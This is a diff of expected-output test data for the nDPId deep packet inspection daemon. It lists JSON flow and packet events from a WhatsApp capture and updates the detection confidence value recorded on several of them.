00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":7516,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":13,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1655042688447} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655042688447,"flow_last_seen":1655042688447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655042688447,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1655042688447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655042688447,"pkt":"eJS0JASgYDjgxTWgCABFAAA8k4BAAD8GbsHAqAJkszzDMaNQFGac145xAAAAAKAC\/\/+5KwAAAgQFtAQCCAo3tzqhAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1655042688525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655042688525,"pkt":"eJS0JASgYDjgxTWgCABFAAA0k4FAAD8GbsjAqAJkszzDMaNQFGac145yikooJoAQAIAprAAAAQEICje3OwWKYYCH"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1655042689647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655042689647,"pkt":"eJS0JASgYDjgxTWgCABFAAA4k4JAAD8GbsPAqAJkszzDMaNQFGac145yikooJoAYAIDgCgAAAQEICje3P1WKYYCHRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655042688447,"flow_last_seen":1655042689683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655042689683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655034332550,"flow_last_seen":1655034332854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655042690163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655042688447,"flow_last_seen":1655042689683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655042689683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655034332550,"flow_last_seen":1655034332854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655042690163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":114,"packets-processed":113,"total-skipped-flows":0,"total-l4-payload-len":7810,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":14,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":1655043596112} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655043596112,"flow_last_seen":1655043596112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655043596112,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1655043596112,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655043596112,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sPxAAD8GUVXAqAJkszzDIZJqFGboXByKAAAAAKAC\/\/9iMwAAAgQFtAQCCAoEt\/vxAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1655043596145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655043596145,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sP1AAD8GUVzAqAJkszzDIZJqFGboXByLxoplnYAQAKyC0AAAAQEICgS3\/BKyfC6v"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1655043596145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655043596145,"pkt":"eJS0JASgYDjgxTWgCABFAAA4sP5AAD8GUVfAqAJkszzDIZJqFGboXByLxoplnYAYAKw9fwAAAQEICgS3\/BKyfC6vRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043596112,"flow_last_seen":1655043596146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655043596146,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043596112,"flow_last_seen":1655043596146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655043596146,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":122,"packets-processed":121,"total-skipped-flows":0,"total-l4-payload-len":9083,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":15,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":96,"global_ts_msec":1655044288744} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655044288744,"flow_last_seen":1655044288744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655044288744,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1655044288744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655044288744,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Rj1AAD8GvBTAqAJkszzDIZLOFGbS4v0+AAAAAKAC\/\/8FAwAAAgQFtAQCCAoEwo14AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1655044288776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655044288776,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Rj5AAD8GvBvAqAJkszzDIZLOFGbS4v0\/XwbxEoAQAKw+pwAAAQEICgTCjaZrpjiA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655044288777,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Rj9AAD8GvBbAqAJkszzDIZLOFGbS4v0\/XwbxEoAYAKz5VAAAAQEICgTCjadrpjiARUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044288744,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655044288777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044288744,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655044288777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":130,"packets-processed":129,"total-skipped-flows":0,"total-l4-payload-len":10356,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":16,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":102,"global_ts_msec":1655044965142} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655044965142,"flow_last_seen":1655044965142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655044965142,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1655044965142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655044965142,"pkt":"eJS0JASgYDjgxTWgCABFAAA8At1AAD8G\/2TAqAJkszzDMbK6FGZec+QxAAAAAKAC\/\/+2PgAAAgQFtAQCCApG+geGAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1655044965172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655044965172,"pkt":"eJS0JASgYDjgxTWgCABFAAA0At5AAD8G\/2vAqAJkszzDMbK6FGZec+QyZebbNIAQAVdZxAAAAQEICkb6B6qVR7NZ"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1655044965191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655044965191,"pkt":"eJS0JASgYDjgxTWgCABFAAA4At9AAD8G\/2bAqAJkszzDMbK6FGZec+QyZebbNIAYAVcUYAAAAQEICkb6B72VR7NZRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044965142,"flow_last_seen":1655044965221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655044965221,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655036863658,"flow_last_seen":1655036864020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655044965409,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044965142,"flow_last_seen":1655044965221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655044965221,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655036863658,"flow_last_seen":1655036864020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655044965409,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":138,"packets-processed":137,"total-skipped-flows":0,"total-l4-payload-len":10673,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":17,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":109,"global_ts_msec":1655045751925} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655045751925,"flow_last_seen":1655045751925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655045751925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1655045751925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655045751925,"pkt":"eJS0JASgYDjgxTWgCABFAAA8tn9AAD8GS8LAqAJkszzDMbMAFGajVEhsAAAAAKAC\/\/+wTwAAAgQFtAQCCApG\/mQPAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1655045751957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655045751957,"pkt":"eJS0JASgYDjgxTWgCABFAAA0toBAAD8GS8nAqAJkszzDMbMAFGajVEhtoOKxA4AQAVeXTwAAAQEICkb+ZC\/0vP+i"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1655045751963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655045751963,"pkt":"eJS0JASgYDjgxTWgCABFAAA4toFAAD8GS8TAqAJkszzDMbMAFGajVEhtoOKxA4AYAVdR+QAAAQEICkb+ZDT0vP+iRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655045751925,"flow_last_seen":1655045751993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655045751993,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037943346,"flow_last_seen":1655037943539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":2513,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037784969,"flow_last_seen":1655037785423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655045751925,"flow_last_seen":1655045751993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655045751993,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037943346,"flow_last_seen":1655037943539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":2513,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037784969,"flow_last_seen":1655037785423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":146,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":10990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":18,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1655049443230} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655049443230,"flow_last_seen":1655049443230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655049443230,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1655049443230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655049443230,"pkt":"eJS0JASgYDjgxTWgCABFAAA8KCVAAD8G2hzAqAJkszzDMbVGFGZeo\/3WAAAAAKAC\/\/\/eUwAAAgQFtAQCCApHIcLoAAAAAAEDAwg="} 